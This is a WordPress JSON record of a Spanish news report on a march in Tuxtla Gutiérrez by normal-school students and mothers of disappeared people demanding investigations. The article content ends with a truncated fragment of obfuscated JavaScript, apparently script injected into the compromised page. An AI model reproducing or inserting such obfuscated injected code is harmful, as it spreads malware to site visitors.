{"id":17246,"date":"2024-08-14T03:15:51","date_gmt":"2024-08-14T03:15:51","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=17246"},"modified":"2024-08-14T03:15:53","modified_gmt":"2024-08-14T03:15:53","slug":"piden-no-olvidar-a-los-desaparecidos","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=17246","title":{"rendered":"Piden no olvidar a los desaparecidos"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"765\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/FB_IMG_1723605285776-1024x765.jpg\" alt=\"\" class=\"wp-image-17247\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/FB_IMG_1723605285776-1024x765.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/FB_IMG_1723605285776-300x224.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/FB_IMG_1723605285776-768x574.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/FB_IMG_1723605285776.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Manuel R\u00edos.<\/p>\n\n\n\n<p>13 de agosto del 2024. Tuxtla Guti\u00e9rrez. &#8211; Normalistas de la Mactumatz\u00e1 y las \u201cMadres en Resistencia\u201d, realizaron una marcha conjunta en la capital chiapaneca para exigir un alto a los ataques contra el normalismo y acelerar las investigaciones para dar con el paradero de la poblaci\u00f3n desaparecida.<\/p>\n\n\n\n<p>La concentraci\u00f3n inici\u00f3 en el \u201cPuente de Colores\u201d, y posteriormente parti\u00f3 la marcha hacia el centro de Tuxtla Guti\u00e9rrez.<\/p>\n\n\n\n<p>En el trayecto los estudiantes acusaron que, desde hace tres sexenios han sobrevivido a los embates que ha sufrido esta escuela que brinda educaci\u00f3n superior que brinda educaci\u00f3n a los hijos de los campesinos y de las zonas m\u00e1s marginas del estado.<\/p>\n\n\n\n<p>\u201cA\u00f1o con a\u00f1o hemos visto como se ha recortado el personal, la plantilla de docentes, los subsidios y eso es lo que hemos estado peleando, a pesar de que muchas veces se nos acusa de cometer actos vand\u00e1licos\u201d, precisaron los normalistas de la Mactu.<br>En el m\u00edtin realizado en el centro de Tuxtla Guti\u00e9rrez, la madre de la joven Cassandra Isabel Arias Torres, desaparecida hace dos a\u00f1os en el municipio de Berrioz\u00e1bal, inform\u00f3 que, en todo este tiempo, las autoridades no tienen ning\u00fan avance del caso.<\/p>\n\n\n\n<p>Indic\u00f3 que, en diferentes ocasiones han tenido la necesidad de tomar acciones para que, no se d\u00e9 carpetazo a los casos, o las autoridades retomen las investigaciones.<\/p>\n\n\n\n<p>\u201cCassandra lleva casi dos a\u00f1os desaparecida, y no sabemos nada de su paradero, no hay avance alguno por eso hemos tenido que presionar de esta forma\u201d, expresaron.<\/p>\n\n\n\n<p>Las Madres en Resistencia, sentenciaron que, continuar\u00e1n con \u00e9stas acciones.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Manuel R\u00edos. 13 de agosto del 2024. Tuxtla Guti\u00e9rrez. &#8211; Normalistas de la Mactumatz\u00e1 y las \u201cMadres en Resistencia\u201d, realizaron una marcha conjunta en la capital chiapaneca para exigir un alto a los ataques contra el normalismo y acelerar las investigaciones para dar con el paradero de la poblaci\u00f3n desaparecida. La concentraci\u00f3n inici\u00f3 en el &hellip;<\/p>\n","protected":false},"author":2,"featured_media":17247,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-17246","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17246","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=17246"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17246\/revisions"}],"predecessor-version":[{"id":17248,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17246\/revisions\/17248"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/17247"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=17246"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=17246"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=17246"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}